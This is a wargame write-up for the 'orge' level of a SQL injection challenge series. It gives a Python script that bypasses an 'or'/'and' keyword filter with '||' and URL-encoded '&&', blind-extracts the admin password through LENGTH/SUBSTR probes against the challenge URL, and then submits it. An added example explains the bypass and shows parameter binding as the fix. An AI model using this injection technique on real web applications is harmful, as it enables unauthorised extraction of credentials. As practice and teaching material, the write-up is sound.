7. LOS - orge
2018. 8. 5. 17:17ㆍWarGame/LOS
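This is LOS orge. I got stuck here for quite a while.
Looking at the source code,
it is very similar to problem 4, and `or` and `and` are banned. So it took a lot of time to bypass this, and I wasted effort on a syntax error I couldn't figure out.. heh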
tip!! {
or -> ||
and -> %26%26
}
Below is the payload.
```python
import requests
import string

num_alpha = string.digits + string.ascii_letters
password = ""
pw_length = 0

resetURL = "http://los.eagle-jump.org/orge_40d2b61f694f72448be9c97d1cea2480.php"
# input your cookie
cookies = dict(PHPSESSID="dvs710ccqajrn9434hc3a00r11")

# find length passwd
for i in range(1, 10):
    try:
        URL = resetURL
        payload = "?pw=1234' || id ='admin' %26%26 LENGTH(pw)=" + str(i) + "%23"
        URL += payload
        response = requests.get(URL, cookies=cookies)
        print("[O] \n" + str(i) + ". connect success!!")
    except requests.RequestException:
        print("[X] Error Code...OTL")
        continue  # no response to inspect for this length
    if response.text.find("</h2>") > 0:
        print("passwd's length is : " + str(i) + "(grin)")
        pw_length = i
        break

# password LENGTH
for i in range(1, pw_length + 1):
    # ord("0") = 48 & ord("Z") = 90
    for j in num_alpha:
        URL = resetURL
        payload = "?pw=1' || id ='admin' %26%26 ASCII(SUBSTR(pw," + str(i) + ", 1))=" + str(ord(j)) + "%23"
        URL += payload
        response = requests.get(URL, cookies=cookies)
        if response.text.find("</h2>") > 0:
            password += j
            print(str(i) + "'s password is : " + j)
            break

# when you find password? exploit!!
print(password)
URL = resetURL
payload = "?pw=" + password
URL += payload
response = requests.get(URL, cookies=cookies)
print(response.text)
```
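Why the substitutions in the tip get past a keyword ban, and what closes the hole, as an added example that is not code from the original post. The filter regex, the `users` table and its rows are assumptions constructed for illustration (the challenge's real source is not shown on this page), and SQLite stands in for the database.

```python
import re
import sqlite3
from urllib.parse import parse_qs

# Assumption: a stand-in for the challenge's filter, rejecting "or" / "and".
KEYWORD_BLACKLIST = re.compile(r"or|and", re.IGNORECASE)

# Constructed query strings modelled on the payload above (length 8 is made up).
RAW = "pw=1234' || id ='admin' && LENGTH(pw)=8#"
ENCODED = "pw=1234' || id ='admin' %26%26 LENGTH(pw)=8%23"


def decoded_pw(query_string):
    """Return the pw parameter as the server sees it after URL decoding."""
    return parse_qs(query_string).get("pw", [""])[0]


def blacklist_allows(value):
    """True when the keyword blacklist lets the value through."""
    return KEYWORD_BLACKLIST.search(value) is None


def make_db():
    """In-memory table with constructed rows (hypothetical schema)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id TEXT, pw TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)",
                     [("guest", "guestpw"), ("admin", "c0nstructed")])
    return conn


def login_rows(conn, pw):
    """Hardened lookup: pw is bound as data and never parsed as SQL."""
    sql = "SELECT id FROM users WHERE id = 'guest' AND pw = ?"
    return conn.execute(sql, (pw,)).fetchall()


if __name__ == "__main__":
    conn = make_db()
    for label, qs in (("raw", RAW), ("encoded", ENCODED)):
        pw = decoded_pw(qs)
        print(label, repr(pw), "filter passes:", blacklist_allows(pw),
              "rows:", login_rows(conn, pw))
```

A raw `&&` is split off by the query-string parser, so only the text before it reaches `pw`; encoded as `%26%26` (with `%23` for `#`) the whole expression arrives intact and still contains neither banned keyword. With the bound parameter the same string is compared as a literal value and matches no row.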